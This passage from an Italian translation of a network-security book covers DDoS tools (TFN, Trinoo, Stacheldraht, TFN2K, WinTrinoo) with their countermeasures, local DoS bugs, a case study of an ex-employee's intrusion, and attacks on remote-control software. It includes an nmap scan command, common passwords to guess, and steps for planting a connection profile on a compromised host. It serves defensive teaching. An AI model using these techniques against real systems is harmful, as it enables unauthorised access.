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servizio si verifica durante il processo di conversione della password di ingresso e 
della password memorizzata, in un formato adatto al confronto quando la password 
di ingresso è molto grande (superiore a 40.000 caratteri). L'esecuzione di questo at- 
tacco è banale e verrà trattata nel Capitolo 15. 


Contromisure per l'applicazione Administrator 
di Coldfusion 


Le contromisure per questo tipo di attacco verranno esaminate in dettaglio nel Capi- 
tolo 15. 


Attacchi DoS distribuiti 


All'epoca della pubblicazione della prima edizione di questo libro, nella sua versio- 
ne originale, il concetto di attacchi DoS distribuiti era puramente teorico. Oggi non 
si può più parlare di computer senza pronunciare la parola “DDos”, Come per i ma- 
lefici virus cresciuti come erbaccia su Internet, i mezzi di comunicazione si sono 
buttati a capofitto sugli attacchi DDoS. 

Il primo attacco DDo$ in grande stile risale al febbraio 2000. Lanciato prima contro 
Yahoo e poi successivamente contro E*TRADE, eBay, buy.com, CNN.com e altri, 
causò il blocco di sette dei principali siti Web conosciuti e di numerosi altri siti di 
cui nessuno aveva mai sentito parlare. Vorremmo poter dire che questi attacchi fu- 
rono condotti da un'élite di hacker che volevano imporre le loro stravaganti idee ai 
poveri utenti della rete, ma purtroppo è vero il contrario. 

Gli attacchi DDoS si verificano quando qualcuno (in genere ragazzini annoiati) uti- 
lizza il software gratuito disponibile, per inviare un turbinio di pacchetti di dati 
all’host o alla rete di destinazione nel tentativo di esaurirne le risorse. Per realizzare 
attacchi DoS distribuiti, l'attacco deve essere portato da diverse sorgenti contempo- 
raneamente e il solo modo per farlo è manomettere i sistemi di computer presenti 
su Internet. 

Il primo obiettivo di un hacker che voglia lanciare un attacco DDoS è individua- 
re e ottenere l’accesso come amministratore sul maggior numero di sistemi pos- 
sibile. Questa inquietante operazione è in genere realizzata ricorrendo a uno 
script di attacco personalizzato che consente di individuare i sistemi vulnerabili. 
Nel corso del libro, abbiamo descritto in che modo l’hacker può arrivare a con- 
cepire e realizzare questi script. Per capire quello che sta succedendo, date 
un'occhiata ai nostri log @Home e DSL firewall. Pirati alle prime armi di tutto il 
mondo passano il loro tempo a esaminare queste modeste sottoreti, alla ricerca 
di un sistema configurato in modo errato o di un software vulnerabile che con- 
senta di accedere al computer obiettivo. 

Una volta ottenuto l’accesso al sistema, gli hacker caricano il loro software DDo$ e 
lo eseguono. In genere, la maggior parte dei server o dei demoni DDo$ rimane in 
attesa di istruzioni prima di attaccare, Questo consente ai pirati di caricare il soft- 
ware necessario sugli host manomessi e attendere il momento più propizio per in- 
viare l'ordine di attacco. 

Nella Figura 12.3 viene illustrato come si svolge un tipico attacco, dalla manomissio- 
ne di più sistemi all’assalto finale. 
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Figura 12.3 
L'attacco di tipo DDoS (Denial of Service distribuito). 


Il numero degli strumenti DDoS cresce mensilmente; quindi un'analisi completa e ag- 
giornata sarebbe impossibile. In seguito esamineremo quelli che secondo noi sono gli 
strumenti DDo$ essenziali: nei paragrafi seguenti ci occuperemo di TFN, Trinoo, Sta- 
cheldraht TFN2K e WinTrinoo. Gli altri strumenti sul mercato, come Shaft e mStreams, 
sono basati su quelli citati in precedenza. Per avere informazioni su mStreams, consulta- 
tehttp://staff.washington.edu/dittrich/misc/mstream.analysis.txt. 


® TFN (Tribe Flood Network) 


Diffusione: 7 
Semplicità: 5: 
Impatto: 9 
Fattore di rischio: 7 


Scritto da un hacker che si faceva chiamare Mixter, TFN è stato il primo strumento 
DDo$ pubblico, basato su UNIX (si trovava principalmente sui sistemi Solaris e Red- 
Hat). TFN è composto da un client e da un server; questo consente all’hacker di in- 
stallare il server su un sistema remoto manomesso e, eseguendo poco più di un co- 
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mando sul client, avviare un attacco DDoS su vasta scala. Tra i numerosi tipi di attac- 
co che possono essere condotti con TFN, ricordiamo ICMP, Smurf, UDP e SYN Flo- 
od. In aggiunta ai componenti utilizzati per l'attacco, TFN consente anche la creazio- 
ne di una root shell collegata a una porta TCP. 

Per maggiori informazioni su TFN, potete consultare il saggio di Dave Dittrich di- 
sponibile all'indirizzo http://staff.washington.edu/dittrich/misc/ddos/. 


Contromisure aTFN 
Intercettazione 


Su Internet sono disponibili numerosi meccanismi di intercettazione di TFN. Tra 
questi meritano di essere citati e vale la pena di esaminare DDOSPing di Foundsto- 
ne (http://ww.foundstone.com), Zombie Zapper del gruppo Razor di Bindview 
(http://razor.bindview.com) e find_ddos (http://www.nipc.gov) realizzato dal 
NIPC (National Infrastructure Protection Center). 


Prevenzione 


Affinché i propri computer non vengano utilizzati come zombi per sferrare questo 
tipo di attacchi, è necessario impedire la manomissione dei sistemi. Questo significa 
mettere in atto tutti i passaggi descritti nel Capitolo 7, dedicato a UNIX, e che com- 
prendono la limitazione dell’utilizzo di servizi non indispensabili, l'applicazione de- 
gli aggiornamenti forniti dai produttori di sistemi operativi e delle applicazioni soft- 
ware, e l'impostazione delle autorizzazioni di accesso a file e directory. 

Poiché le comunicazioni TFN utilizzano il protocollo ICMP, un'ulteriore misura pre- 
ventiva consiste nell’impedire il traffico ICMP in ingresso sulla propria rete. 

Per proteggere i sistemi dagli attacchi dei sistemi TFN zombi, è possibile impiegare 
una qualche forma di filtraggio di velocità sui router esterni (per esempio il filtrag- 
gio ICMP per limitare gli attacchi ICMP e Smurf), gli stessi disponibili nel sistema 
operativo Cisco TOS 12.0, e configurare in Cisco IOS 12.0 il servizio CBAC (Context 
Based Access Control), per ridurre il rischio di attacchi SYN. 


DC) Trinoo 


Diffusione: 7 
Semplicità: 5 
Impatto: 9 
Fattore di rischio: vd 


Simile a TFN, Trinoo utilizza la comunicazione tra un programma di controllo remo- 
to (client) e un master per inviare ai demoni (server) l'istruzione di attacco. La co- 
municazione tra il client e il master avviene sulla porta TCP 27665, e in genere ri- 
chiede l'inserimento della password “betaalmostdone”. La comunicazione tra il ma- 
ster e il server avviene sulla porta UDP 27444, mentre la comunicazione di ritorno 
tra il server e il master avviene in genere sulla porta UDP statica 31335. 


rr 
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(©) Contromisure a Trinoo 
Intercettazione 


Sono disponibili un certo numero di meccanismi di intercettazione che consentono 
di individuare la presenza di Trinoo, tra questi ricordiamo DDOSPing di Foundsto- 
ne (http://www.foundstone.com), Zombie Zapper del gruppo Razor di Bindview 
(http://razor.bindview.com) e find_ddos (http://ww.nipc.gov) realizzato dal 
NIPC (National Infrastructure Protection Center). 


Prevenzione 


Analogamente a TFN, la migliore prevenzione consiste nell’evitare che il sistema 
venga manomesso seguendo i passaggi descritti nel Capitolo 7 dedicato a UNIX. 
Per proteggere i sistemi dagli attacchi dei sistemi Trinoo zombi, è possibile impiega- 
re una qualche forma di filtraggio sui router esterni (per esempio, il filtraggio ICMP 
per limitare gli attacchi ICMP e Smurf), gli stessi disponibili nel sistema operativo Ci- 
sco TOS 12.0, e configurare, sempre in Cisco IOS 12.0, il servizio CBAC (Context Ba- 
sed Access Control) per ridurre il rischio di attacchi SYN. 


C) Stacheldraht 


Diffusione: 7 
Semplicità: 5 
Impatto: 9 
Fattore di rischio: Ed 


Stacheldraht combina le caratteristiche di Trinoo con quelle di TFN, per fornire uno 
strumento di distruzione ricco di funzionalità, compresa una sessione telnet cifrata 
tra slave e master. L'hacker è in grado di annullare l’efficacia dei sistemi di rilevazio- 
ne delle intrusioni dedicati alle reti, per consentire attacchi DoS indisturbati. Analo- 
gamente a TFN, Stacheldraht è in grado di sferrare attacchi di tipo ICMP-, UDP-, 
SYN- e Smurf. Per le comunicazioni client/server viene utilizzata una combinazione 
di pacchetti TCP e ICMP (ECHO reply). 

Il meccanismo di cifratura delle comunicazioni tra client e server è basato su un algo- 
ritmo a chiave simmetrica. Stacheldraht prevede anche una protezione mediante pass- 
word predefinita. Una funzionalità aggiuntiva che vale la pena menzionare è la possi- 
bilità di aggiornare il componente server su richiesta, utilizzando il comando rep. Per 
maggiori informazioni su Stacheldraht, potete consultare il saggio di Dave Dittrich di- 
sponibile all'indirizzo http://staff.washington.edu/dittrich/misc/ddos/. 


Contromisure a Stacheldraht 
Intercettazione 


Tra i meccanismi di intercettazione che consentono di individuare la presenza di 
Stacheldraht, ricordiamo DDOSPing di Foundstone (http://ww.foundsto- 
ne.com), Zombie Zapper del gruppo Razor di Bindview (http://razor.bin- 
dview.com) e find_ddos (http://ww.nipc.gov) realizzato dal NIPC (National In- 
frastructure Protection Center). 
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Prevenzione 


Come per gli altri strumenti esaminati, la miglior difesa contro Stacheldraht è impedire 
che i sistemi possano essere utilizzati come zombi per attacchi DDoS. Questo significa 
mettere in atto tutti i passaggi descritti nel capitolo dedicato a UNIX (Capitolo 7) e che 
comprendono, tra gli altri, la limitazione dell'utilizzo di servizi non indispensabili, 
l'applicazione degli aggiornamenti e delle applicazioni software e l'impostazione del- 
le autorizzazioni di accesso a file e directory. 

Esiste un altro tipo di misura preventiva che è possibile adottare contro l'utilizzo 
di Stacheldraht, analoga a quella vista per TFN. Poiché le comunicazioni Sta- 
cheldraht utilizzano il protocollo ICMP, è possibile impedire il traffico ICMP in 
ingresso sulla rete. 

Per proteggere i sistemi dagli attacchi dei sistemi Stacheldraht zombi, è possibile im- 
piegare una qualche forma di filtraggio sui router esterni (per esempio il filtraggio 
ICMP per limitare gli attacchi ICMP e Smurf), gli stessi disponibili nel sistema opera- 
tivo Cisco IOS 12.0, e configurare, sempre in Cisco IOS 12.0, il servizio CBAC (Con- 
text Based Access Control) per ridurre il rischio di attacchi SYN. 


de 


2 TEN2K 

Diffusione: 8 
Semplicità: 5 
Impatto: D 
Fattore di rischio: 7 


TFN2K CTFN 2000) è il successore del programma TFN originale realizzato da Mix- 
ter. L'ultimo nato nella famiglia degli strumenti DDoS è distante anni luce dalla sua 
versione originale. Le sue caratteristiche principali sono la trasmissione casuale sul- 
le porte (eliminando il blocco delle porte sui router esterni come misura preventiva) 
e la cifratura delle trasmissioni (eliminando la possibilità di utilizzare programmi di 
IDS basati sulla rete come contromisura di intercettazione). Analogamente al suo 
predecessore, TFN2K può attaccare con SYN, UDP, ICMP e Smurf, passando casual- 
mente da un tipo di attacco all’altro. A differenza di Stracheldraht, però, TFN2K uti- 
lizza una forma di cifratura più debole nota come codifica su base 64. 

Per un’analisi dettagliata di TFN2K, potete consultare il saggio di Jason Barlow e 
Woody Thrower dell'AXENT Security Team, disponibile all'indirizzo http://pac- 
ketstormsecurity.net. 


Contromisure a TFN2K 
Intercettazione 


Tra i meccanismi di intercettazione che consentono di individuare la presenza di 
TFN2K, ricordiamo Zombie Zapper del gruppo Razor di Bindview (http://razor 
.bindview.com) e find_ddos (http://ww.nipc.gov) realizzato dal NIPC (National 
Infrastructure Protection Center). 


Prevenzione 


Come per gli altri strumenti DDoS, la miglior difesa contro TFN2K è impedire che 
i sistemi possano essere utilizzati come zombi per attacchi DDoS. Questo significa 
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mettere in atto tutti i passaggi descritti nel Capitolo 7 dedicato a UNIX e che com- 
prendono, tra gli altri, la limitazione dell'utilizzo di servizi non indispensabili, 
l'applicazione di tutti gli aggiornamenti forniti dai produttori di sistemi operativi e 
delle applicazioni software, e l'impostazione delle autorizzazioni di accesso a file 
e directory. 

Per proteggere i sistemi dagli attacchi dei sistemi TFN2K zombi, è possibile impie- 
gare una qualche forma di filtraggio sui router esterni (per esempio il filtraggio 
ICMP per limitare gli attacchi ICMP e Smurf), gli stessi disponibili nel sistema opera- 
tivo Cisco TOS 12.0, e configurare, sempre in Cisco IOS 12.0, il servizio CBAC (Con- 
text Based Access Control) per ridurre il rischio di attacchi SYN. 


1) WinTrinoo 


Diffusione: 5 
Semplicità: 5 
Impatto: 9 
Fattore di rischio: 6 


WinTrinoo è stato presentato al pubblico per la prima volta dal gruppo Razor di 
Bind-view. WinTrinoo è la versione Windows di 'Trinoo e dispone di tutte le fun- 
zionalità del suo parente stretto. Lo strumento assume le sembianze di un trojan 
denominato in genere service.exe (se non è stato rinominato) che occupa 23.145 
byte. Una volta avviato l'eseguibile, viene aggiunto un valore alla chiave Run del 
Registro di configurazione di Windows, in modo che il programma sia fatto parti- 
re a ogni avvio del sistema: 


HKEY_ LOCAL _MACHINE\Software\Microsoft\Windows\CurrentVersion\Run 
System Services: REG SZ: service.exe 


4 Prestate attenzione a non confondere il file service.exe di WinTrinoo con il 
file services.exe. 


Ovviamente il Registro di configurazione viene modificato solo se, nel percorso del siste- 


© Contromisure aWinTrinoo 


Per individuare WinTrinoo, è possibile perlustrare la rete alla ricerca di una porta 
TCP 0 UDP 34555 aperta oppure di un file service.exe (sebbene possa essere stato 
rinominato) di 23.145 byte. Oltre a questa tecnica manuale, è possibile adottare un 
programma antivirus, come Norton Antivirus di Symantec, che mette automatica- 
mente il file in quarantena prima che venga eseguito. 


Attacchi DoS locali 


Anche se sono gli attacchi DoS remoti a comparire sui giornali, quelli locali posso- 
no essere altrettanto devastanti. Sono molti i sistemi multiutente oggetto di attac- 
chi DoS non autorizzati, lanciati da utenti autorizzati. La maggior parte degli attac- 
chi Do$ locali consuma le risorse del sistema o sfrutta i difetti dei programmi per 
negare l’accesso agli utenti legittimi. Nonostante esistano centinaia di attacchi DoS 
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locali per sistemi UNIX e Windows, ci limiteremo a illustrare un attacco con esau- 
rimento di risorse per Windows e uno di sfruttamento di un difetto di programma- 
zione per UNIX. 


C) Terminal Server e proquota.exe in Windows NT 4.0 


Diffusione: 2 
Semplicità: + 
Impatto: 7 
Fattore di rischio: d 


Un classico esempio di attacco con esaurimento delle risorse (resowrce starvation) 
consiste nell'utilizzo dello spazio disponibile su disco al di là dei limiti consentiti. La 
funzionalità di ripartizione del disco in quote si è affermata ormai da tempo nel 
mondo UNIX, ma è relativamente recente per Windows NT. Con Windows NT Ter- 
minal Server Edition - SP4, un normale utente è in grado di sfruttare tale funzionalità 
per riempire %systemdrive%. Il risultato è l'impossibilità di accedere al sistema da 
parte di tutti gli utenti che non dispongano di una copia locale del proprio profilo, 
In questo attacco Do$, agli utenti non dovrebbe essere consentito disconnettersi se 
hanno superato la propria quota di spazio su disco. Tuttavia, l’utente può terminare 
il processo proquota.exe per aggirare questa restrizione e scollegarsi. Questo è pos- 
sibile perché l’owner del processo proquota.exe è l'utente, mentre dovrebbe essere 
l'account di sistema. 


DÌ Contromisure per Terminal Server e proquota.exe 


È buona norma conservare i file di sistema e i dati utente su due partizioni distinte e 
questo esempio ne è la prova. %systemdrive% dovrebbe trovarsi su una partizione 
diversa rispetto ai file accessibili all’utente. Inoltre, sarebbe bene posizionare i pro- 
fili su una partizione non avviabile e utilizzarli solo quando necessario. 


9 Kernel panic 


Diffusione: 2 
Semplicità: 1 
Impatto: 7 
Fattore di rischio: 3 


Il kernel di Linux versione 2.2.0 presentava una potenziale condizione DoS se ldd, 
un programma utilizzato per stampare le dipendenze dalle librerie condivise, fosse 
stato utilizzato per esaminare alcuni file critici. Il problema era legato alla chiamata 
alla funzione munmap() utilizzata in Idd: in particolari condizioni, munmap() riusciva 
a sovrascrivere aree critiche della memoria del kernel, causando il panico nel siste- 
ma e conseguentemente riavviando la macchina. Questo problema non è assoluta- 
mente grave, ma serve a dimostrare il concetto fondamentale alla base degli attacchi 
DoS: nella maggior parte dei casi, un utente senza diritti può sfruttare un difetto di 
programmazione per corrompere aree di memoria critiche utilizzate dal kernel. Il ri- 
sultato è quasi sempre una situazione di Kernel panic. 
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Contromisure al Kernel panic 


La patch del kernel per la risoluzione di questo problema è stata successivamente 
incorporata nella versione 2.2.1. Le possibilità di intervenire attivamente per assicu- 
rarsi che il sistema operativo e i componenti collegati non risentano di difetti di pro- 
grammazione sono piuttosto scarse, se il codice sorgente è privato. Tuttavia, in mol- 
te versioni free di UNIX, è possibile controllare il codice sorgente alla ricerca di di- 
fetti di programmazione o altri problemi legati alla sicurezza. 
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Caso di studio:la vendetta 
di un ex dipendente 


Restava un ultimo server. Anche in questo caso, come negli altri quattro, si trattava 
di un server Web IIS. Il server in questione ospitava il database dell’assistenza tecni- 
ca online della società, che era protetto mediante autenticazione HTTP Basic dalla 
pagina root del server Web. Gli ultimi quattro server sembravano pronti per essere 
colti come frutti maturi, ma, dopo una serie di attacchi falliti, Jared iniziò a pensare 
che questa fosse una rete che non sarebbe riuscito a compromettere. Questi server 
erano stati rinforzati con le patch più recenti: gli addetti alla sicurezza avevano pre- 
visto la possibilità che un intruso giocasse qualche scherzo. Egli aveva un vantaggio 
in questo caso: conosceva bene la loro rete, L'estate del suo terzo anno di studi ave- 
va fatto uno stage in questa azienda e alla fine dell'estate era stato assunto part-time 
come ingegnere di rete junior. Questo lavoro gli era piaciuto, ma poi era stato licen- 
ziato in seguito alla scoperta del server FTP che aveva creato nella sottorete, Il ser- 
ver non c'era più, ma le macchine di produzione erano ancora disponibili e Jared 
era risoluto a cambiare questo stato di cose. 

Tuttavia, dopo le sue dimissioni, gli amministratori di sistema si erano impegnati. Ja- 
red sapeva per certo che il server Web dell’azienda era stato affetto dalla vulnerabi- 
lità della divulgazione del codice sorgente “translate: f*; tuttavia, in seguito alle sue 
dimissioni questa vulnerabilità era stata risolta con opportune patch. Mentre il suo 
script di attacco IIS continuava a martellare il sito Web dell’assistenza tecnica, Jared 
si sforzò di pensare a un punto vulnerabile che potesse essere sfuggito agli ammini- 
stratori. Improvvisamente, si rammentò di un avviso che aveva letto qualche giorno 
prima e pensò al server SQL. 

Meno di due settimane prima, Microsoft aveva rilasciato un hotfix destinato a risol- 
vere un problema relativo al servizio di risoluzione di SQL Server, che veniva ese- 
guito sulla porta 1434/UDP. Dopo qualche rapida ricerca su Google e una visita a 
IRC, Jared disponeva del codice di attacco e di idee precise su come utilizzarlo. 
C'era solo un'altra domanda cui rispondere: avrebbe potuto accedere alla 
1434/UDP su uno qualsiasi dei sistemi? Per ridurre al minimo l'emissione di avvisi 
da parte dell'IDS, Jared aveva limitato la sua precedente scansione delle porte alla 
80/TCP e alla 443/TCP; ora eseguì una scansione sulla rete limitandosi alla porta 
1434/UDP. Per rendere la cosa più interessante, Jared configurò la scansione delle 
porte in modo tale da utilizzare una porta di origine 53/UDP, per convincere il 
firewall che il computer di Jared era un server DNS che rispondeva a una richiesta. 
La scansione delle porte restituì immediatamente una risposta sul server Web. SQL 
veniva eseguito a livello locale sul server Web! Jared attivò l’attacco SQL sul server 
Web e si fregò le mani per la soddisfazione. Era stata scavalcata la linea di difesa 
principale, quindi egli era ormai in grado di scorrazzare sull'intera rete dell'azienda. 
A questo punto gli restava unicamente da individuare il server utilizzato per il calco- 
lo delle retribuzioni dei dipendenti. 


Capitolo 13 
Controllo remoto 


Il prezzo di un'economia interconnessa a livello mondiale è rappresentato dalla ne- 
cessità di gestirla globalmente. Il personale dell'assistenza non è sempre a disposi- 
zione per intervenire direttamente dove c'è un computer guasto e risolvere i proble- 
mi. La soluzione esiste: il software per controllo remoto. 

Programmi come pcAnywhere, ControliT, ReachOut, Timbuktu e VCN sono stati 
una specie di grazia divina per gli amministratori, perché hanno consentito loro di 
saltare in modo virtuale da una macchina all'altra per risolvere problemi o aiutare 
gli utenti in qualche attività. Sfortunatamente, però, questi pacchetti software sono 
spesso configurati in modo errato o pieni di problemi di sicurezza. Questo consente 
agli hacker di accedere a un sistema e scaricare dati riservati 0, peggio ancora, ser- 
virsi di quel computer per attaccare l’intera azienda, facendo apparire un dipenden- 
te come responsabile dell’attacco. 

In questo capitolo illustreremo le tecniche impiegate dagli hacker per trovare questi si- 
stemi sulla rete (per maggiori informazioni sul controllo remoto via telefono vi riman- 
diamo al Capitolo 8), le modalità di sfruttamento degli errori di configurazione e dei var- 
chi nella sicurezza e le attività necessarie per chiudere una volta per tutte queste falle. 


Alla ricerca dei software di controllo remoto 


Tutti i prodotti dedicati alla rete restano in attesa di connessioni aprendo specifiche 
porte sulla macchina host. Il numero e il tipo delle porte dipende unicamente dal 
software. Utilizzando un programma di scansione delle porte è possibile trovare tut- 
ti i computer all’interno di una rete su cui sia in esecuzione un sistema di controllo 
remoto. Sarete sorpresi di scoprire quanti utenti abbiano installato software di que- 
sto tipo non autorizzati o supportati. 

La Tabella 13.1 riporta un elenco di prodotti per il controllo remoto e delle relative 
porte di ascolto predefinite. Si tratta solo di dati indicativi, in quanto, come specifi- 
cato nella tabella, molti dei prodotti consentono l'utilizzo di qualsiasi porta libera. 
Ricordate che per riuscire a utilizzare le nuove porte è necessario modificare i rife- 
rimenti tanto sul PC host che su quello chiamante. Modificando i valori su un solo 
lato della connessione, questa avverrà per default sulla porta TCP 65301. Per ese- 
guire una scansione delle porte da una macchina Windows, consigliamo uno qual- 
siasi degli strumenti di cui vi abbiamo parlato nel Capitolo 2, come NetScanTools 
Pro 2000, SuperScan, WinScan, ipEye o WUPS, Inoltre vi consigliamo di esaminare 
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Tabella 13.1  |programmi per il controllo remoto che possono essere riconosciuti 
con una scansione delle porte 

Software TCP UDP Porte alternative 
Citrix ICA 1494 1494 Ignote 
pcAnywhere 22, 5631, 5632, 65301 22, 5632 Sì* 
ReachOut 43188 Nessuna No 
Remotely Anywhere 2000, 2001 Nessuna Sì 
Remotely Possible/ControllT 799, 800 800 Sì 
Timbuktu 407 407 No 
VNC 5800, 5801..., 5900, 5901.. Nessuna Sì 
Windows Terminal Services 3380 Nessuna No 
RAdmin 4899 Nessuna Sì 


* Anche pcAnywhere prevede l'utilizzo di porte diverse da quelle predefinite, per i canali Data 
(5631) e Status (5632), ma l'opzione per impostare questi valori non è presente nel programma di 
configurazione: per modificare queste porte è necessario utilizzare REGEDT32.EXE e intervenire 
sui seguenti valori: 
HKLM\SOFTWARE\SYMANTEC\PCANYWHERE\CURRENTVERSION\SYSTEM\TCPIPDATAPORT 
HKLM\SOFTWARE\SYMANTEC\PCANYWHERE\CURRENTVERSION\SYSTEM\TCPIPSTATUSPORT 


ScanLine di Foundstone disponibile all'indirizzo http://ww.foundstone.com/ 
knowledge/free_tools.html. Sono tutti strumenti veloci, flessibili e affidabili che 
consentono di identificare le porte di ascolto dei servizi per il controllo remoto. 
Per effettuare una scansione da una macchina Linux, potete utilizzare il caro vec- 
chio nmap (http://ww.insecure.org/nmap), che permette di riconoscere tutti i 
software presenti su una subnet: 


nmap -s$ -p 407,799,1494,2000,3389,4899,5631,5800,43188 -n 192.168.10.0/24 


Come sempre, consigliamo di utilizzare uno script (come la procedura Perl disponi- 
bile sul sito Web ww. hackingexposed. com) per effettuare scansioni ad ampio rag- 
gio su diverse reti alla ricerca di sistemi “indisciplinati”. 


Connessione 


Una volta identificate nei client e server della vostra rete le porte per il controllo re- 
moto, l'hacker cercherà con ogni probabilità di collegarsi. Al termine di un’installa- 
zione standard, la quasi totalità delle applicazioni di controllo remoto resta a com- 
pleta disposizione di chiunque tenti di collegarsi, senza neanche richiedere nome 
utente o password (e gli hacker adorano questa dimenticanza). 

L'unico modo per verificare se un utente abbia protetto con una password un certo 
pacchetto software è provare a collegarsi manualmente utilizzando il software adatto, 
Non ci risultano particolari script in grado di eseguire correttamente test di connessio- 
ne. Se sulla vostra rete trovate un sistema su cui risulta installato un particolare tipo di 
applicazione di controllo remoto (per esempio, Timbuktu o ControllT) e non avete li- 
cenze d'uso per quel programma, non preoccupatevi: potete sempre scaricarne una 
versione completamente funzionante dal Web. Su Internet sono infatti disponibili ver- 
sioni demo o di prova dei principali prodotti di controllo remoto. Installate il software 
e provate a collegarvi a ciascuno di questi sistemi. Sapete quanti utenti lasciano la 
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password non impostata? Se non vi viene richiesto un nome utente, la schermata del 
sistema remoto si presenterà sul vostro schermo come un bel regalo di Natale. 

Se questo semplice tentativo non è sufficiente a farvi entrare, potete provare a enu- 
merare gli utenti del sistema (Capitolo 3) e verificarli uno a uno. Molte applicazioni 
per controllo remoto si appoggiano ai meccanismi di autenticazione interni di NT 
per i nomi utente e le password. Una volta ottenuti i nomi utente definiti sul siste- 
ma, potrete tornare a collegarvi al sistema remoto e provare gli utenti uno a uno, 
senza fornire una password o inserendo quelle tipiche, come, “nome_utentel”, 
“password”, “admin”, “secret”, “<mome_società>"” e così via. Se restate ancora a 
mani vuote, potete tirare un sospiro di sollievo: se non altro il sistema è stato ade- 
guatamente protetto con una password. Dato che la procedura di autenticazione 
nativa di Windows è trasparente all’utente, prima di avviare test di questo tipo assi- 
curatevi di non aver effettuato l’accesso a nessun dominio. 


Punti deboli 


L'abbiamo già ripetuto diverse volte: la sicurezza della vostra rete è data da quella 
del suo anello più debole. Nel caso del software per controllo remoto non potrebbe 
esserci affermazione più esatta. Una volta manomesso un host (come abbiamo visto 
nel Capitolo 5), l’hacker può sfruttare una serie di punti deboli per rientrare succes- 
sivamente in tutta legittimità. Per esempio, alcuni dei prodotti più datati non proteg- 
gono nomi utente e password con la cifratura, consentendo agli intrusi di estrarre 
queste informazioni dai file, dalle stesse schermate, 0, peggio ancora, dal cavo di 
rete. L’unico modo sicuro per verificare se i vostri prodotti siano vulnerabili è quello 
di metterli alla prova voi stessi. 

Tutti i programmi per controllo remoto presentano qualche falla nella sicurezza, 
quindi sarebbe bene controllare tutte le possibilità. Ecco alcuni problemi noti. 


e Nomiutente e password in chiaro. 

e Password mascherate (utilizzando algoritmi di cifratura deboli, come la so- 
stiluzione). 

e Password rivelate (intercettate sull’interfaccia utente da remoto o copiando 
il file in locale). 

e Upload di profili utente. 


® Nomi utente e password in chiaro 


Diffusione: 6 
Semplicità: 8 
Impatto: 10 
Fattore di rischio: 8 


Remotely Possible 4.0 di Computer Associates non prevedeva alcun meccanismo di 
sicurezza per la memorizzazione di nomi utente e password. Come si può vedere 
nella Figura 13.1, il file \PROGRAMMI\AVALAN\REMOTELY POSSIBLE\MAIN.SAB 
contiene sia i nomi utente sia le password in chiaro, il che corrisponde a offrire la 
possibilità di entrare al primo venuto. 

Dopo questa scoperta, Computer Associates ha pubblicato un aggiornamento che 
realizza un certo livello di cifratura. La patch, e la nuova versione del prodotto di 
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( UltraE dit-32 - [C:AMine\exposed\Section4\Ch12 - remote control\MAIN.SAB] 
L- Ele Edi Search Biojeot View Forma Copmn Macro Advanced \Wndow Heb 212/%) 


00000000h: (1 00 FF FF 01 00 72 65 73 : R55....CAddress 
00000010h: FF FE FF 04 74 00 65 00 73 00 74 00 FF FE FF 08 : jby.t.e.s.t.$bw. 
00000020h: 31 00 30 00 2E 00 31 00 2E 00 31 00 2E 00 31 00: 1.0...1...1...1 
00000030h: FF FE FF 04 54 00 45 00 53 00 54 00 FF FE FF 06 : sby TE.S.T.ybw 
00000040h: 61 00 62 00 63 00 61 00 62 00 63 00 FF FE FF 00 : a b.c.a bc by 
00000050h: FF FE FF 00 | shy. 


For Help. pres Pos: 0H, 0 {Modi 3711/99 12:0440PM — [File Size: 84 
Figura 13.1 


Come dimostra il nostro editor di testo, Remotely Possible 4.0 memonzzava sia i nomi utente 
sia le password in chiaro. Nel file si vede che all'utente "TEST" è associata la password "“abcabc". 


CA ControliT 4.5, dovrebbe cifrare le password nel file MAIN.SAB. Ma siamo sicu- 
ri che lo faccia? 


(} 


CD) Password mascherate 


Diffusione: 6 
Semplicità: 6 
Impatto: 10 
Fattore di rischio: 7 


ControliT 4.5, la versione successiva di Remotely Possible 4.0, doveva essere un ag- 
giornamento della versione precedente, che memorizzava nomi utente e password 
in chiaro. Purtroppo, invece di implementare una vera e propria cifratura delle pass- 
word, è stato scelto un semplice algoritmo di sostituzione per le sole password. Per 
esempio, la password “abcedabed” diventerebbe: 


pixdplixd 
Sapendo questo, è possibile ricostruire la mappa dell'intero alfabeto e decifrare 


qualsiasi password istantaneamente. Con il nome utente ancora in chiaro, mettere 
le mani sul tesoro sarebbe davvero un gioco da ragazzi. 


® Password rivelate 


Diffusione: 9 
Semplicità: 9 
Impatto: 10 
Fattore di rischio: 9 


Revelation, di SnadBoy Software (http: //www.snadboy.com), è uno degli strumenti di 
sicurezza di cui è impossibile fare a meno. Questo minuscolo eseguibile (14 K) è in gra- 
do di rivelare le password conservate in memoria dai principali programmi di controllo 
remoto. Vi risulterà certo familiare il campo utilizzato per le password, quello in cui 
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ogni carattere digitato si presenta come un asterisco. Ebbene, questo campo si limita a 
nascondere la password, senza effettivamente cifrarla. Molte applicazioni risultano vul- 
nerabili su questo punto, comprese pcAnywhere (senza la patch), VNC e Remotely Pos- 
sible/ControliT. Revelation è in grado di “rivelare” la password nascosta dietro gli asteri- 
schi semplicemente trascinando l’oggetto Revelation sul campo della password. 

D'altra parte, ReachOut, Remotely Anywhere, Timbuktu e la versione corretta di 
pcAnywhere non sono esposte a questo tipo di attacco: ReachOut e Remotely 
Anywhere perché si appoggiano allo User Manager di NT per gestire gli account; 
Timbuktu (si veda la figura seguente) perché per la password si serve di meccani- 
smi più sicuri, per cui Revelation riesce solo a leggere caratteri senza senso, 


ar Al 


%# SnadBoy's Revelation v1.1 


Secunig — — 


Guests Registered Users | NT Users] 


Password Field Selector 
Assign user's name and password... @ 
Name: [Mike Sia 


cn 1. Left click and drag the cross to 
Password: |" the desited password field 
Confite rrememmmeeen — 2. Read the revealed password 
Password 
+ Check the services to grant (ITA di 14 100) Si ettari een 
{RW (Gend I Exchange 


Add Registered User | | fi Control n Egchange n ——o—_____ __—_——————“É 
B Registered User | | IT Qbserve IT Exchange = SnadBoyonthe web http://www. snadboy.com | 


(JT Chat T Intercom 
Password Restrictions... | 7 Nut - questio dschless@snadboy com_| 


C) Upload dei profili utente 


Diffusione: 5 
Semplicità: 5: 
Impatto: 10 
Fattore di rischio: 7 


Una volta che sia riuscito a penetrare in un sistema NT e a conquistare il controllo 
amministrativo con altri mezzi, l'hacker può caricare i propri profili utente (per 
esempio, file .CIF o MAIN.SAB) e ottenere automaticamente l’accesso al sistema con 
la propria password. Sia pcAnywhere sia Remotely Possible 4.0 risultano esposti a 
questo attacco. Per ottenere questo risultato, l’intruso adotta la procedura seguente. 
1. Crea un profilo di connessione utilizzando la vostra copia di pcAnywhere o 
Remotely Possible. 
2. Identifica e copia questo nuovo profilo nella directory \DATA o \AVA- 
LAN\REMOTELY POSSIBLE del sistema target. 


